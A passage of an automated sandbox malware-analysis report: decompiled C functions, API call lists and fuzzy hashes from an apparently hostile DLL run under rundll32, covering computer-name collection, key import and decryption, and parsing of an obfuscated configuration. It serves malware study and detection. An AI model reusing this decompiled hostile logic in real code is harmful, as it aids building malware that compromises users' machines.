                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SysAllocString.OLEAUT32(04215F20), ref: 04212835
                      • Part of subcall function 04215F80: SysFreeString.OLEAUT32(?), ref: 0421605F
                    • SysFreeString.OLEAUT32(00000000), ref: 04212875
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: String$Free$Alloc
                    • String ID:
                    • API String ID: 986138563-0
                    • Opcode ID: 744704fcfa03100e30b61bbad47e109fe42d511482da35daa80eae36d0d35e50
                    • Instruction ID: 08a8580679bc80d3fd4185ab188a705027d2c5e35824d163c83cfbc4c4092595
                    • Opcode Fuzzy Hash: 744704fcfa03100e30b61bbad47e109fe42d511482da35daa80eae36d0d35e50
                    • Instruction Fuzzy Hash: 0E014F7261010ABFDB119F58D80899FBBB9EF58350B414061F905A6130D775AD15CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E04212985(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
                    				void* _t24;
                    				signed short _t25;
                    				signed int _t27;
                    				intOrPtr* _t28;
                    				signed short _t29;
                    
                    				_t28 = __edi;
                    				if(_a4 == 0) {
                    					L2:
                    					_t29 = E04211BC5(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                    					if(_t29 == 0) {
                    						_t27 = _a12 >> 1;
                    						if(_t27 == 0) {
                    							_t29 = 2;
                    							HeapFree( *0x421a2d8, 0, _a4);
                    						} else {
                    							_t24 = _a4;
                    							 *(_t24 + _t27 * 2 - 2) =  *(_t24 + _t27 * 2 - 2) & _t29;
                    							 *_t28 = _t24;
                    						}
                    					}
                    					L6:
                    					return _t29;
                    				}
                    				_t25 = E04213CEA(_a4, _a8, _a12, __edi); // executed
                    				_t29 = _t25;
                    				if(_t29 == 0) {
                    					goto L6;
                    				}
                    				goto L2;
                    			}

                    APIs
                      • Part of subcall function 04213CEA: SysFreeString.OLEAUT32(00000000), ref: 04213D50
                    • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74E5F710,?,00000000,?,00000000,?,042133D6,?,004F0053,04A993D8,00000000,?), ref: 042129E6
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: Free$HeapString
                    • String ID: Ut
                    • API String ID: 3806048269-8415677
                    • Opcode ID: 9f5925ec8236e351e8cf7301c7f9326b92aeb1ae4c33095cb3b8eaa6f7df554c
                    • Instruction ID: 5f1f0631f0fc979b6b2aa4b0ec235a77a50aa6b4c478d0cee696ef6bb151cccd
                    • Opcode Fuzzy Hash: 9f5925ec8236e351e8cf7301c7f9326b92aeb1ae4c33095cb3b8eaa6f7df554c
                    • Instruction Fuzzy Hash: 7401FF3221125AFBDB229F48DC05FEA7BA9FF14790F148055FE056A130D771E960DB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 37%
                    			E0421256F(void* __ecx) {
                    				signed int _v8;
                    				void* _t15;
                    				void* _t19;
                    				void* _t20;
                    				void* _t22;
                    				intOrPtr* _t23;
                    
                    				_t23 = __imp__;
                    				_t20 = 0;
                    				_v8 = _v8 & 0;
                    				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                    				_t10 = _v8;
                    				if(_v8 != 0) {
                    					_t20 = E042163FD(_t10 + 1);
                    					if(_t20 != 0) {
                    						_t15 =  *_t23(3, _t20,  &_v8); // executed
                    						if(_t15 != 0) {
                    							 *((char*)(_v8 + _t20)) = 0;
                    						} else {
                    							E042117AB(_t20);
                    							_t20 = 0;
                    						}
                    					}
                    				}
                    				return _t20;
                    			}










                    APIs
                    • GetComputerNameExA.KERNEL32(00000003,00000000,?,?,00000000,?,?,04216999), ref: 04212587
                      • Part of subcall function 042163FD: RtlAllocateHeap.NTDLL(00000000,00000000,042128D5), ref: 04216409
                    • GetComputerNameExA.KERNEL32(00000003,00000000,?,?,?,?,04216999), ref: 042125A4
                      • Part of subcall function 042117AB: HeapFree.KERNEL32(00000000,00000000,04212976,00000000,?,?,00000000), ref: 042117B7
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: ComputerHeapName$AllocateFree
                    • String ID:
                    • API String ID: 187446995-0
                    • Opcode ID: 3eb9d129c1bb9b9e6880e82d9a7e591d29c51944b5751d7c0f86b3d81778cab2
                    • Instruction ID: d0b2881acad95648f4697fd747cb76bfcee38e967d5b4b525acf9e75abcbea5a
                    • Opcode Fuzzy Hash: 3eb9d129c1bb9b9e6880e82d9a7e591d29c51944b5751d7c0f86b3d81778cab2
                    • Instruction Fuzzy Hash: 6AF0B47271010AFAE730D6998C54EAF76FDDBD4650F1000A5F905E3150EAB0EF028670
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E042145D2(signed int __edx, intOrPtr _a4) {
                    				void* _t3;
                    				void* _t5;
                    				void* _t8;
                    				void* _t9;
                    				void* _t10;
                    				signed int _t11;
                    
                    				_t11 = __edx;
                    				_t3 = HeapCreate(0, 0x400000, 0); // executed
                    				 *0x421a2d8 = _t3;
                    				if(_t3 == 0) {
                    					_t9 = 8;
                    					return _t9;
                    				}
                    				 *0x421a1c8 = GetTickCount();
                    				_t5 = E04215A5A(_a4);
                    				if(_t5 == 0) {
                    					E04212A4C(_t10, _a4); // executed
                    					if(E04214C43(_t10) != 0) {
                    						 *0x421a300 = 1; // executed
                    					}
                    					_t8 = E04216535(_t11); // executed
                    					return _t8;
                    				}
                    				return _t5;
                    			}










                    APIs
                    • HeapCreate.KERNEL32(00000000,00400000,00000000,0421108E,?), ref: 042145DB
                    • GetTickCount.KERNEL32 ref: 042145EF
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: CountCreateHeapTick
                    • String ID:
                    • API String ID: 2177101570-0
                    • Opcode ID: 50c141fd817cb39fc67ec2b703d68433d0ead63bf1ba9780c4173dda290ba65a
                    • Instruction ID: 54e760b87cf6dd6a9a44435c511589285b15c673c78dc1f96f1ac4efe222208b
                    • Opcode Fuzzy Hash: 50c141fd817cb39fc67ec2b703d68433d0ead63bf1ba9780c4173dda290ba65a
                    • Instruction Fuzzy Hash: B4E09270761341BAE7207F74BD49B0975E4EB70B4AF104025F90DD10B4DFB9E840AE21
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 34%
                    			E04213CEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                    				intOrPtr _v12;
                    				void* _v18;
                    				short _v20;
                    				intOrPtr _t15;
                    				short _t17;
                    				intOrPtr _t19;
                    				short _t23;
                    
                    				_t23 = 0;
                    				_v20 = 0;
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosw");
                    				_t15 =  *0x421a320; // 0x87d5a8
                    				_t4 = _t15 + 0x421b39c; // 0x4a98944
                    				_t20 = _t4;
                    				_t6 = _t15 + 0x421b124; // 0x650047
                    				_t17 = E04215F80(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                    				if(_t17 < 0) {
                    					_t23 = _t17;
                    				} else {
                    					if(_v20 != 8) {
                    						_t23 = 1;
                    					} else {
                    						_t19 = E04212E8A(_t20, _v12);
                    						if(_t19 == 0) {
                    							_t23 = 8;
                    						} else {
                    							 *_a16 = _t19;
                    						}
                    						__imp__#6(_v12);
                    					}
                    				}
                    				return _t23;
                    			}











                    APIs
                      • Part of subcall function 04215F80: SysFreeString.OLEAUT32(?), ref: 0421605F
                      • Part of subcall function 04212E8A: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,042125F5,004F0053,00000000,?), ref: 04212E93
                      • Part of subcall function 04212E8A: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,042125F5,004F0053,00000000,?), ref: 04212EBD
                      • Part of subcall function 04212E8A: memset.NTDLL ref: 04212ED1
                    • SysFreeString.OLEAUT32(00000000), ref: 04213D50
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: FreeString$lstrlenmemcpymemset
                    • String ID:
                    • API String ID: 397948122-0
                    • Opcode ID: 055548b718b9346e783a860a17fc604b1cc24cf5ff800ea41b0df08ab73d77bb
                    • Instruction ID: f54c20513249333b4911e0e299f24f078452c918467fe63fd57043fb2f185b47
                    • Opcode Fuzzy Hash: 055548b718b9346e783a860a17fc604b1cc24cf5ff800ea41b0df08ab73d77bb
                    • Instruction Fuzzy Hash: 37018032720019BBEB11DF98CC049AEBBFAFB14B50F004461E905E6030D3B1A955CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E04217885(void* __ecx, void* __edx, void* _a4, void* _a8) {
                    				void* _t13;
                    				void* _t21;
                    
                    				_t11 =  &_a4;
                    				_t21 = 0;
                    				__imp__( &_a8);
                    				_t13 = E04214872( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
                    				if(_t13 == 0) {
                    					_t21 = E042163FD(_a8 + _a8);
                    					if(_t21 != 0) {
                    						E0421213D(_a4, _t21, _t23);
                    					}
                    					E042117AB(_a4);
                    				}
                    				return _t21;
                    			}






                    APIs
                    • lstrlen.KERNEL32(?,?,?,00000000,?,0421191E,00000000,?,?,?,04216ABB,?,04A995B0), ref: 04217896
                      • Part of subcall function 04214872: CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000018,F0000000,?,00000110,04213AC6), ref: 042148AA
                      • Part of subcall function 04214872: memcpy.NTDLL(?,04213AC6,00000010,?,?,?,?,?,?,?,?,?,?,042160F5,00000000,04214DD9), ref: 042148C3
                      • Part of subcall function 04214872: CryptImportKey.ADVAPI32(00000000,?,0000001C,00000000,00000000,?), ref: 042148EC
                      • Part of subcall function 04214872: CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 04214904
                      • Part of subcall function 04214872: memcpy.NTDLL(00000000,04214DD9,04213AC6,0000011F), ref: 04214956
                      • Part of subcall function 042163FD: RtlAllocateHeap.NTDLL(00000000,00000000,042128D5), ref: 04216409
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                    • String ID:
                    • API String ID: 894908221-0
                    • Opcode ID: 0375958fbb515978b5d43e1cf5bd04b3b63177f9a90a420d0cfc0573471f75f7
                    • Instruction ID: c1dc2ee9d4a471f0c47a610d375d27f9cace377a445d2e9079fe92bd7efb13f4
                    • Opcode Fuzzy Hash: 0375958fbb515978b5d43e1cf5bd04b3b63177f9a90a420d0cfc0573471f75f7
                    • Instruction Fuzzy Hash: 09F03076210109BADF01AE59DC04CEF3BADEFD5764B018021FD189A120DB31E555D7A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 88%
                    			E042156CF(intOrPtr* __edi) {
                    				intOrPtr _v8;
                    				char _v12;
                    				intOrPtr _v16;
                    				intOrPtr _t15;
                    				intOrPtr* _t21;
                    
                    				_t21 = __edi;
                    				_push( &_v12);
                    				_push(__edi);
                    				_v8 = 0x1d4c0;
                    				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
                    				while(1) {
                    					_v16 = _t15;
                    					Sleep(0x1f4); // executed
                    					if(_v12 == 4) {
                    						break;
                    					}
                    					if(_v8 == 0) {
                    						L4:
                    						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
                    						continue;
                    					} else {
                    						if(_v8 <= 0x1f4) {
                    							_v16 = 0x80004004;
                    						} else {
                    							_v8 = _v8 - 0x1f4;
                    							goto L4;
                    						}
                    					}
                    					L8:
                    					return _v16;
                    				}
                    				goto L8;
                    			}









                    APIs
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: c48dd64712cb587a6cf28ab8b028434230f90fd0e9fa1f88464bcf94e609ef44
                    • Instruction ID: f61aad7b0a72cd5175d0c4a3cd9d4c843cdc6846832fb47abfa6a53fcc3770eb
                    • Opcode Fuzzy Hash: c48dd64712cb587a6cf28ab8b028434230f90fd0e9fa1f88464bcf94e609ef44
                    • Instruction Fuzzy Hash: C4F01475E21219FFCB00DB98D489AEDB7F8FF55244F1080EAE502A3210E3B46A81CB65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E042134EE(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20) {
                    				void* _t17;
                    
                    				if(_a4 == 0) {
                    					L2:
                    					return E042134AC(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
                    				}
                    				_t17 = E0421281B(_a4, _a8, _a12, _a16, _a20); // executed
                    				if(_t17 != 0) {
                    					goto L2;
                    				}
                    				return _t17;
                    			}





                    APIs
                    • lstrlenW.KERNEL32(?,?,?,04212CE7,3D042190,80000002,04211850,04215F20,74666F53,4D4C4B48,04215F20,?,3D042190,80000002,04211850,?), ref: 04213513
                      • Part of subcall function 0421281B: SysAllocString.OLEAUT32(04215F20), ref: 04212835
                      • Part of subcall function 0421281B: SysFreeString.OLEAUT32(00000000), ref: 04212875
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: String$AllocFreelstrlen
                    • String ID:
                    • API String ID: 3808004451-0
                    • Opcode ID: 363984a1adc73a2757fd26d7b837a964770e8dde85d45b906d6c0e2b39b5dc4f
                    • Instruction ID: d66c86d03a455af05761020e997b864426c8c0f8f168980cae267839bd71b2c2
                    • Opcode Fuzzy Hash: 363984a1adc73a2757fd26d7b837a964770e8dde85d45b906d6c0e2b39b5dc4f
                    • Instruction Fuzzy Hash: E6F0923211010EBFEF029F90EC45E9A3FAAEB28794F048014FE0555071D732EAB1EBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E04214DC8(void* __edi, void* _a4) {
                    				int _t7;
                    				int _t12;
                    
                    				_t7 = E0421607D(__edi, _a4,  &_a4); // executed
                    				_t12 = _t7;
                    				if(_t12 != 0) {
                    					memcpy(__edi, _a4, _t12);
                    					 *((char*)(__edi + _t12)) = 0;
                    					E042117AB(_a4);
                    				}
                    				return _t12;
                    			}






                    APIs
                      • Part of subcall function 0421607D: memcpy.NTDLL(00000000,00000110,?,?,?,?,04214DD9,?,04213AC6,04213AC6,?), ref: 042160B3
                      • Part of subcall function 0421607D: memset.NTDLL ref: 04216128
                      • Part of subcall function 0421607D: memset.NTDLL ref: 0421613C
                    • memcpy.NTDLL(?,04213AC6,00000000,?,04213AC6,04213AC6,?,?,04213AC6,?), ref: 04214DE4
                      • Part of subcall function 042117AB: HeapFree.KERNEL32(00000000,00000000,04212976,00000000,?,?,00000000), ref: 042117B7
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: memcpymemset$FreeHeap
                    • String ID:
                    • API String ID: 3053036209-0
                    • Opcode ID: cbe814ac95b5c3fbea9387f03cde9c72dc3506a6f1379caf50c8319b0ad1936c
                    • Instruction ID: 3c2f0cd841d5680e2d2376bf45ecc7b812895cf002bc6c81296dd55bbc43e7ed
                    • Opcode Fuzzy Hash: cbe814ac95b5c3fbea9387f03cde9c72dc3506a6f1379caf50c8319b0ad1936c
                    • Instruction Fuzzy Hash: 9EE08C37610129B7DB122A94DC40EFF7FACDF656D1F044060FE089A220E632E62193E2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E04214EF3(void* __ebx, int* __ecx, void* __edi, void* __esi) {
                    				int _v8;
                    				void* _v12;
                    				void* _v16;
                    				signed int _t28;
                    				signed int _t33;
                    				signed int _t39;
                    				char* _t45;
                    				char* _t46;
                    				char* _t47;
                    				char* _t48;
                    				char* _t49;
                    				char* _t50;
                    				void* _t51;
                    				void* _t52;
                    				void* _t53;
                    				intOrPtr _t54;
                    				void* _t56;
                    				intOrPtr _t57;
                    				intOrPtr _t58;
                    				signed int _t61;
                    				intOrPtr _t64;
                    				signed int _t65;
                    				signed int _t70;
                    				void* _t72;
                    				void* _t73;
                    				signed int _t75;
                    				signed int _t78;
                    				signed int _t82;
                    				signed int _t86;
                    				signed int _t90;
                    				signed int _t94;
                    				signed int _t98;
                    				void* _t101;
                    				void* _t102;
                    				void* _t115;
                    				void* _t118;
                    				intOrPtr _t121;
                    
                    				_t118 = __esi;
                    				_t115 = __edi;
                    				_t104 = __ecx;
                    				_t101 = __ebx;
                    				_t28 =  *0x421a31c; // 0x69b25f44
                    				if(E04214451( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
                    					 *0x421a374 = _v8;
                    				}
                    				_t33 =  *0x421a31c; // 0x69b25f44
                    				if(E04214451( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
                    					_v12 = 2;
                    					L69:
                    					return _v12;
                    				}
                    				_t39 =  *0x421a31c; // 0x69b25f44
                    				_push(_t115);
                    				if(E04214451( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
                    					L67:
                    					HeapFree( *0x421a2d8, 0, _v16);
                    					goto L69;
                    				} else {
                    					_push(_t101);
                    					_t102 = _v12;
                    					if(_t102 == 0) {
                    						_t45 = 0;
                    					} else {
                    						_t98 =  *0x421a31c; // 0x69b25f44
                    						_t45 = E0421572F(_t104, _t102, _t98 ^ 0x7895433b);
                    					}
                    					_push(_t118);
                    					if(_t45 != 0) {
                    						_t104 =  &_v8;
                    						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                    							 *0x421a2e0 = _v8;
                    						}
                    					}
                    					if(_t102 == 0) {
                    						_t46 = 0;
                    					} else {
                    						_t94 =  *0x421a31c; // 0x69b25f44
                    						_t46 = E0421572F(_t104, _t102, _t94 ^ 0x219b08c7);
                    					}
                    					if(_t46 != 0) {
                    						_t104 =  &_v8;
                    						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                    							 *0x421a2e4 = _v8;
                    						}
                    					}
                    					if(_t102 == 0) {
                    						_t47 = 0;
                    					} else {
                    						_t90 =  *0x421a31c; // 0x69b25f44
                    						_t47 = E0421572F(_t104, _t102, _t90 ^ 0x31fc0661);
                    					}
                    					if(_t47 != 0) {
                    						_t104 =  &_v8;
                    						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                    							 *0x421a2e8 = _v8;
                    						}
                    					}
                    					if(_t102 == 0) {
                    						_t48 = 0;
                    					} else {
                    						_t86 =  *0x421a31c; // 0x69b25f44
                    						_t48 = E0421572F(_t104, _t102, _t86 ^ 0x0cd926ce);
                    					}
                    					if(_t48 != 0) {
                    						_t104 =  &_v8;
                    						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
                    							 *0x421a004 = _v8;
                    						}
                    					}
                    					if(_t102 == 0) {
                    						_t49 = 0;
                    					} else {
                    						_t82 =  *0x421a31c; // 0x69b25f44
                    						_t49 = E0421572F(_t104, _t102, _t82 ^ 0x3cd8b2cb);
                    					}
                    					if(_t49 != 0) {
                    						_t104 =  &_v8;
                    						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
                    							 *0x421a02c = _v8;
                    						}
                    					}
                    					if(_t102 == 0) {
                    						_t50 = 0;
                    					} else {
                    						_t78 =  *0x421a31c; // 0x69b25f44
                    						_t50 = E0421572F(_t104, _t102, _t78 ^ 0x2878b929);
                    					}
                    					if(_t50 == 0) {
                    						L41:
                    						 *0x421a2ec = 5;
                    						goto L42;
                    					} else {
                    						_t104 =  &_v8;
                    						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
                    							goto L41;
                    						} else {
                    							L42:
                    							if(_t102 == 0) {
                    								_t51 = 0;
                    							} else {
                    								_t75 =  *0x421a31c; // 0x69b25f44
                    								_t51 = E0421572F(_t104, _t102, _t75 ^ 0x261a367a);
                    							}
                    							if(_t51 != 0) {
                    								_push(_t51);
                    								_t72 = 0x10;
                    								_t73 = E04211760(_t72);
                    								if(_t73 != 0) {
                    									_push(_t73);
                    									E04214DFF();
                    								}
                    							}
                    							if(_t102 == 0) {
                    								_t52 = 0;
                    							} else {
                    								_t70 =  *0x421a31c; // 0x69b25f44
                    								_t52 = E0421572F(_t104, _t102, _t70 ^ 0xb9d404b2);
                    							}
                    							if(_t52 != 0 && E04211760(0, _t52) != 0) {
                    								_t121 =  *0x421a3cc; // 0x4a995b0
                    								E04211000(_t121 + 4, _t68);
                    							}
                    							if(_t102 == 0) {
                    								_t53 = 0;
                    							} else {
                    								_t65 =  *0x421a31c; // 0x69b25f44
                    								_t53 = E0421572F(_t104, _t102, _t65 ^ 0x3df17130);
                    							}
                    							if(_t53 == 0) {
                    								L59:
                    								_t54 =  *0x421a320; // 0x87d5a8
                    								_t22 = _t54 + 0x421b252; // 0x616d692f
                    								 *0x421a370 = _t22;
                    								goto L60;
                    							} else {
                    								_t64 = E04211760(0, _t53);
                    								 *0x421a370 = _t64;
                    								if(_t64 != 0) {
                    									L60:
                    									if(_t102 == 0) {
                    										_t56 = 0;
                    									} else {
                    										_t61 =  *0x421a31c; // 0x69b25f44
                    										_t56 = E0421572F(_t104, _t102, _t61 ^ 0xd2079859);
                    									}
                    									if(_t56 == 0) {
                    										_t57 =  *0x421a320; // 0x87d5a8
                    										_t23 = _t57 + 0x421b791; // 0x6976612e
                    										_t58 = _t23;
                    									} else {
                    										_t58 = E04211760(0, _t56);
                    									}
                    									 *0x421a3e0 = _t58;
                    									HeapFree( *0x421a2d8, 0, _t102);
                    									_v12 = 0;
                    									goto L67;
                    								}
                    								goto L59;
                    							}
                    						}
                    					}
                    				}
                    			}

                    APIs
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,0421A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04214F98
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,0421A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04214FCA
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,0421A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04214FFC
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,0421A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 0421502E
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,0421A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04215060
                    • StrToIntExA.SHLWAPI(00000000,00000000,?,0421A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04215092
                    • HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 04215191
                    • HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 042151A5
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: FreeHeap
                    • String ID: Ut
                    • API String ID: 3298025750-8415677
                    • Opcode ID: 5fbc021df71a4c9123563651f96da55f78811fae61d3496f61c5feee47dd2daa
                    • Instruction ID: 135858b0598f71fd88be031238eb8cf3432b7ffa46c0a1b92d6beff0fca66972
                    • Opcode Fuzzy Hash: 5fbc021df71a4c9123563651f96da55f78811fae61d3496f61c5feee47dd2daa
                    • Instruction Fuzzy Hash: 1F819670B31205FBD711EFB8AC88D6BB7E9EBAC7447240995A005D7234EE79F9818750
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 73%
                    			E0421196A(void* __eax, void* __ecx) {
                    				long _v8;
                    				char _v12;
                    				void* _v16;
                    				void* _v28;
                    				long _v32;
                    				void _v104;
                    				char _v108;
                    				long _t36;
                    				intOrPtr _t40;
                    				intOrPtr _t47;
                    				intOrPtr _t50;
                    				void* _t58;
                    				void* _t68;
                    				intOrPtr* _t70;
                    				intOrPtr* _t71;
                    
                    				_t1 = __eax + 0x14; // 0x74183966
                    				_t69 =  *_t1;
                    				_t36 = E0421624F(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                    				_v8 = _t36;
                    				if(_t36 != 0) {
                    					L12:
                    					return _v8;
                    				}
                    				E04217961( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                    				_t40 = _v12(_v12);
                    				_v8 = _t40;
                    				if(_t40 == 0 && ( *0x421a300 & 0x00000001) != 0) {
                    					_v32 = 0;
                    					asm("stosd");
                    					asm("stosd");
                    					asm("stosd");
                    					_v108 = 0;
                    					memset( &_v104, 0, 0x40);
                    					_t47 =  *0x421a320; // 0x87d5a8
